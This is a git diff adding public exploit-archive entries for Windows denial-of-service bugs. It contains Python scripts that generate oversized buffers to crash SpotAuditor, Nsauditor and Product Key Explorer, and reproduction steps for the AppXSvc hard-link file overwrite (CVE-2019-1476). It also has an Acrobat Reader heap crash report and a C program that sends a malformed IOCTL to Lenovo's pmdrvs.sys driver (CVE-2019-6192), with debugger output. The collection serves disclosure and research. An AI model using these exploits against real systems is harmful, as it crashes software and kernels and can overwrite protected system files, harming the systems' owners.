+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.PIXrun,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47719.py b/exploits/windows/dos/47719.py
new file mode 100755
index 000000000..b8baf33f7
--- /dev/null
+++ b/exploits/windows/dos/47719.py
@@ -0,0 +1,31 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Tools -> Base64 Encrypted Password
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47723.py b/exploits/windows/dos/47723.py
new file mode 100755
index 000000000..f0def0240
--- /dev/null
+++ b/exploits/windows/dos/47723.py
@@ -0,0 +1,31 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-28
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Key' and click on 'Ok'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47727.py b/exploits/windows/dos/47727.py
new file mode 100755
index 000000000..2238daa8b
--- /dev/null
+++ b/exploits/windows/dos/47727.py
@@ -0,0 +1,32 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-28
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+#Social: twitter.com/ZwX2a
+#contact: msk4@live.fr
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Register -> Enter Registration Code
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Name' and click on 'Ok'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/dos/47728.py b/exploits/windows/dos/47728.py
new file mode 100755
index 000000000..0f3f7639e
--- /dev/null
+++ b/exploits/windows/dos/47728.py
@@ -0,0 +1,35 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, 
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that 
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing 
+# software significantly reduces the total cost of network management in enterprise environments by enabling 
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without 
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+# PoC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 1000
+try:
+    f=open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47732.py b/exploits/windows/dos/47732.py
new file mode 100755
index 000000000..2c52b2d2e
--- /dev/null
+++ b/exploits/windows/dos/47732.py
@@ -0,0 +1,37 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+# Email : blackwolf@post.com
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks 
+# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise 
+# network for all potential methods that a hacker might use to attack it and create a report of potential 
+# problems that were found , Nsauditor network auditing software significantly reduces the total cost of 
+# network management in enterprise environments by enabling IT personnel and systems administrators gather 
+# a wide range of information from all the computers in the network without installing server-side applications 
+# on these computers and create a report of potential problems that were found.
+ 
+# POC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+ 
+buffer = "\x41" * 1000
+try:
+    f=open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47766.py b/exploits/windows/dos/47766.py
new file mode 100755
index 000000000..03547f90d
--- /dev/null
+++ b/exploits/windows/dos/47766.py
@@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Name' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+ 
+# [ About App ]
+ 
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+ 
+
+# [ POC ]
+ 
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+    f = open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47767.py b/exploits/windows/dos/47767.py
new file mode 100755
index 000000000..81b7e06a5
--- /dev/null
+++ b/exploits/windows/dos/47767.py
@@ -0,0 +1,47 @@
+# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
+# Discovery by: SajjadBnd
+# Date: 2019-12-10
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+ 
+# [ About App ]
+ 
+# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
+# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
+# Visit "Features" page to see all supported software list of programs with which product key finder works.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# Product key Explorer recovers product keys for software installed on your
+# local and network computers, allows track the number of software licenses installed in your business.
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
+# Product Key Finder | Best Product Key Finder Software
+# The Best Product Key Find and Recovery Software     
+# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
+# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
+ 
+
+# [ POC ]
+ 
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+buffer = "\x41" * 100
+buffer += "\x42" * 100
+buffer += "\x43" * 58
+try:
+    f = open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47768.txt b/exploits/windows/dos/47768.txt
new file mode 100644
index 000000000..18115e3a7
--- /dev/null
+++ b/exploits/windows/dos/47768.txt
@@ -0,0 +1,45 @@
+# Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite (DoS)
+# Date: 2019-10-28
+# Exploit Author: Gabor Seljan
+# Vendor Homepage: https://www.microsoft.com/
+# Version: 17763.1.amd64fre.rs5_release.180914-1434
+# Tested on: Windows 10 Version 1809 for x64-based Systems
+# CVE: CVE-2019-1476
+
+# Summary:
+# AppXSvc improperly handles file hard links resulting in a low privileged user
+# being able to overwrite an arbitrary file leading to elevation of privilege.
+
+# Description:
+
+# An elevation of privilege vulnerability exists when the AppX Deployment Server
+# (AppXSvc) improperly handles file hard links. While researching CVE-2019-0841
+# originally reported by Nabeel Ahmed, I have found that AppXSvc can be forced
+# to overwrite an arbitrary file by deleting all registry data files before
+# creating the file hard link. As Nabeel Ahmed described in his write-up of
+# CVE-2019-0841, if the settings.dat file is corrupted it will be replaced with
+# the original settings.dat template. However, additional settings.dat.LOG1 and
+# settings.dat.LOG2 files are also created during the initialization process.
+# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
+# link allows a low privileged user to overwrite an arbitrary file with registry
+# data or just simply empty it, respectively. A low privileged user could exploit
+# this vulnerability to cause denial of service by overwriting critical system
+# files.
+
+Steps to reproduce:
+1. Terminate Paint 3D processes.
+2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
+3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
+4. Execute the start ms-paint: command to run Paint 3D.
+5. Terminate Paint 3D processes.
+
+Expected result:
+It isn't possible to overwrite a file not writable by a low privileged user.
+
+Observed result:
+C:\Windows\win.ini file is overwritten with registry data.
+
+References:
+https://github.com/sgabe/CVE-2019-1476
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
+https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
\ No newline at end of file
diff --git a/exploits/windows/dos/47769.txt b/exploits/windows/dos/47769.txt
new file mode 100644
index 000000000..85e90c3bd
--- /dev/null
+++ b/exploits/windows/dos/47769.txt
@@ -0,0 +1,89 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=707779e0 ebx=25876c38 ecx=052faab8 edx=707703a4 esi=707703d4 edi=25876e34
+eip=10e6c29e esp=052fa89c ebp=052fa8a4 iopl=0         nv up ei pl nz ac po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
+CoolType!CTInit+0x3913e:
+10e6c29e 8902            mov     dword ptr [edx],eax  ds:002b:707703a4=31a03194
+
+0:000> u @eip-14
+CoolType!CTInit+0x3912a:
+10e6c28a 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
+10e6c28d 8b571c          mov     edx,dword ptr [edi+1Ch]
+10e6c290 8b7720          mov     esi,dword ptr [edi+20h]
+10e6c293 035508          add     edx,dword ptr [ebp+8]
+10e6c296 8b4724          mov     eax,dword ptr [edi+24h]
+10e6c299 037508          add     esi,dword ptr [ebp+8]
+10e6c29c 03c6            add     eax,esi
+10e6c29e 8902            mov     dword ptr [edx],eax
+
+0:000> ? poi(edi+1c)
+Evaluate expression: -690332 = fff57764
+
+0:000> ? poi(ebp+8)
+Evaluate expression: 1887538240 = 70818c40
+
+0:000> !heap -p -a 70818c40
+    address 70818c40 found in
+    _DPH_HEAP_ROOT @ bfc1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                723d3b94:         70818c40            173c0 -         70818000            19000
+          unknown!fillpattern
+    0f32a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77f24b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    77e7e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    77e7cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    77e7ccee ntdll!RtlAllocateHeap+0x0000003e
+    0f48aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    77c2f1f6 ucrtbase!_malloc_base+0x00000026
+    5fbefc39 AcroRd32!AcroWinMainSandbox+0x00003ec9
+    10e37991 CoolType!CTInit+0x00004831
+    10e38e1b CoolType!CTInit+0x00005cbb
+    10e68870 CoolType!CTInit+0x00035710
+    10e683dc CoolType!CTInit+0x0003527c
+    10e67d25 CoolType!CTInit+0x00034bc5
+    10e65902 CoolType!CTInit+0x000327a2
+    10e633f2 CoolType!CTInit+0x00030292
+    10e62719 CoolType!CTInit+0x0002f5b9
+    10e620e8 CoolType!CTInit+0x0002ef88
+    10e62000 CoolType!CTInit+0x0002eea0
+    108f36f1 AGM!AGMInitialize+0x0002a881
+
+ 
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 052fa8a4 10e6bde2 70818c40 25876e34 70818c40 CoolType!CTInit+0x3913e
+01 052fa918 10e6bd06 052faab4 052fa9e4 00000001 CoolType!CTInit+0x38c82
+02 052fa930 10e6bce7 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38ba6
+03 052fa944 10e6bb4f 052faab4 052fa9e4 73330f68 CoolType!CTInit+0x38b87
+04 052fa968 10e6b8b0 052facd8 73330f68 110f7080 CoolType!CTInit+0x389ef
+05 052fab08 10e6abf9 73330f68 110f7080 052facd8 CoolType!CTInit+0x38750
+06 052fad64 10e65b0c 052fb054 052faddc 00000000 CoolType!CTInit+0x37a99
+07 052fb07c 10e633f2 000007c6 00000000 00000000 CoolType!CTInit+0x329ac
+08 052fb14c 10e62719 65babff0 00000001 052fb1dc CoolType!CTInit+0x30292
+09 052fb964 10e620e8 6aa0a9b4 052fb97c 6aa0a990 CoolType!CTInit+0x2f5b9
+0a 052fb9e4 10e62000 6aa0a9b4 6aa0a99c 73fdc4da CoolType!CTInit+0x2ef88
+0b 052fba24 108f36f1 7155bd90 6aa0a9b4 6aa0a99c CoolType!CTInit+0x2eea0
+0c 052fba38 108e023e 6aa0a99c 108e01d0 331cbd80 AGM!AGMInitialize+0x2a881
+0d 052fba4c 108df007 331cbd8c 10d84a18 00000001 AGM!AGMInitialize+0x173ce
+0e 052fba84 108f0bcc c1574612 1733a7d0 00000000 AGM!AGMInitialize+0x16197
+0f 052fbb4c 0f327c7a 0bfc16cc 052fbb78 0f3291ab AGM!AGMInitialize+0x27d5c
+--- cut ---
+
+Notes:
+
+- The crash looks very similar to the one reported in Issue #1891 in June 2019, and fixed in August 2019 as CVE-2019-8042. The stack trace and context are nearly identical. It is possible that this is an unfixed variant of the previous vulnerability.
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20040) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-690332 in the above case).
+
+- Attached samples: poc[1-4].pdf (crashing files).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47769.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47771.c b/exploits/windows/dos/47771.c
new file mode 100644
index 000000000..bd8a55ca7
--- /dev/null
+++ b/exploits/windows/dos/47771.c
@@ -0,0 +1,435 @@
+# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
+# Date: 2019-12-11
+# Exploit Author: Nassim Asrir
+# CVE: CVE-2019-6192
+# Tested On: Windows 10(64bit) | ThinkPad T470p
+# Vendor : https://www.lenovo.com/us/en/
+# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
+
+# Description
+# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
+# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes
+# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
+
+# Exploit
+
+#include <windows.h>
+#include <stdio.h>
+#include <conio.h>
+
+int main(int argc, char **argv)
+{
+    HANDLE   hDevice;
+    DWORD    bret;
+    char     szDevice[] = "\\\\.\\pmdrvs";
+
+    printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
+
+    printf("Opening handle to driver..\n");
+   
+    if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE)    {
+        printf("Device %s succesfully opened!\n", szDevice);
+        printf("\tHandle: %p\n", hDevice);
+    }
+    else
+    {
+        printf("Error: Error opening device %s\n", szDevice);
+    }
+
+    printf("\nPress any key to DoS..");
+    _getch();
+
+    bret = 0;
+   
+    if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
+    {
+        printf("DeviceIoControl Error - bytes returned %#x\n", bret);
+    }
+
+    CloseHandle(hDevice);
+    return 0;
+}
+
+
+# RCA
+
+2: kd> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+SYSTEM_SERVICE_EXCEPTION (3b)
+An exception happened while executing a system service routine.
+Arguments:
+Arg1: 00000000c0000005, Exception code that caused the bugcheck
+Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
+Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
+Arg4: 0000000000000000, zero.
+
+FAULTING_IP:
+pmdrvs+109d
+fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]
+
+CONTEXT:  ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
+rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
+rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
+rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
+ r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
+r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
+r14=0000000000000002 r15=0000000000000000
+iopl=0         nv up ei pl zr na po nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+pmdrvs+0x109d:
+fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
+Resetting default scope
+
+CPU_COUNT: 8
+
+CPU_MHZ: af8
+
+CPU_VENDOR:  GenuineIntel
+
+CPU_FAMILY: 6
+
+CPU_MODEL: 9e
+
+CPU_STEPPING: 9
+
+CPU_MICROCODE: 0,0,0,0 (F,M,S,R)  SIG: 8E'00000000 (cache) 0'00000000 (init)
+
+BLACKBOXBSD: 1 (!blackboxbsd)
+
+
+BLACKBOXPNP: 1 (!blackboxpnp)
+
+
+CURRENT_IRQL:  0
+
+ANALYSIS_SESSION_HOST:  LAPTOP-SP
+
+ANALYSIS_SESSION_TIME:  09-30-2019 20:29:54.0485
+
+ANALYSIS_VERSION: 10.0.17763.132 amd64fre
+
+LAST_CONTROL_TRANSFER:  from fffff80428bf5060 to fffff80428bf109d
+
+STACK_TEXT: 
+ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
+ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
+ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
+ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
+ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
+ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
+ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
+00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844
+
+
+THREAD_SHA1_HASH_MOD_FUNC:  fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
+
+THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  4653d18777ce51b05029c753677fc2c05d5811bb
+
+THREAD_SHA1_HASH_MOD:  c2a3dbda00dbcf5ade5303449052a7349d5c580b
+
+FOLLOWUP_IP:
+pmdrvs+109d
+fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]
+
+FAULT_INSTR_CODE:  8941078b
+
+SYMBOL_STACK_INDEX:  0
+
+FOLLOWUP_NAME:  MachineOwner
+
+STACK_COMMAND:  .cxr 0xffffc709dee8ec50 ; kb
+
+BUGCHECK_STR:  2E8B5A19
+
+EXCEPTION_CODE_STR:  2E8B5A19
+
+EXCEPTION_STR:  WRONG_SYMBOLS
+
+PROCESS_NAME:  ntoskrnl.wrong.symbols.exe
+
+IMAGE_NAME:  ntoskrnl.wrong.symbols.exe
+
+MODULE_NAME: nt_wrong_symbols
+
+SYMBOL_NAME:  nt_wrong_symbols!2E8B5A19A70000
+
+BUCKET_ID:  WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
+
+DEFAULT_BUCKET_ID:  WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
+
+PRIMARY_PROBLEM_CLASS:  WRONG_SYMBOLS
+
+FAILURE_BUCKET_ID:  WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
+
+TARGET_TIME:  2019-09-30T19:27:36.000Z
+
+OSBUILD:  17763
+
+OSSERVICEPACK:  0
+
+SERVICEPACK_NUMBER: 0
+
+OS_REVISION: 0
+
+SUITE_MASK:  272
+
+PRODUCT_TYPE:  1
+
+OSPLATFORM_TYPE:  x64
+
+OSNAME:  Windows 10
+
+OSEDITION:  Windows 10 WinNt TerminalServer SingleUserTS
+
+OS_LOCALE: 
+
+USER_LCID:  0
+
+OSBUILD_TIMESTAMP:  1994-09-30 01:21:45
+
+BUILDDATESTAMP_STR:  180914-1434
+
+BUILDLAB_STR:  rs5_release
+
+BUILDOSVER_STR:  10.0.17763.1.amd64fre.rs5_release.180914-1434
+
+ANALYSIS_SESSION_ELAPSED_TIME:  ae
+
+ANALYSIS_SOURCE:  KM
+
+FAILURE_ID_HASH_STRING:  km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
+
+FAILURE_ID_HASH:  {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}
+
+Followup:     MachineOwner
+---------
+
+2: kd> u fffff804`28bf109d
+pmdrvs+0x109d:
+fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]
+fffff804`28bf109f 41894308        mov     dword ptr [r11+8],eax
+fffff804`28bf10a3 e858ffffff      call    pmdrvs+0x1000 (fffff804`28bf1000)
+fffff804`28bf10a8 85c0            test    eax,eax
+fffff804`28bf10aa 0f8582000000    jne     pmdrvs+0x1132 (fffff804`28bf1132)
+fffff804`28bf10b0 488b8c2498000000 mov     rcx,qword ptr [rsp+98h]
+fffff804`28bf10b8 4885c9          test    rcx,rcx
+fffff804`28bf10bb 7475            je      pmdrvs+0x1132 (fffff804`28bf1132)
+2: kd> !for_each_frame .frame /r @$Frame
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
+00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
+rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
+rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
+r14=0000000000000000 r15=ffffc709dee8f408
+iopl=0         nv up ei ng nz na pe nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
+nt!KeBugCheckEx:
+fffff804`1f269040 48894c2408      mov     qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
+01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
+01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
+rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
+rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
+rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
+ r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
+r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
+r14=0000000000000000 r15=ffffc709dee8f408
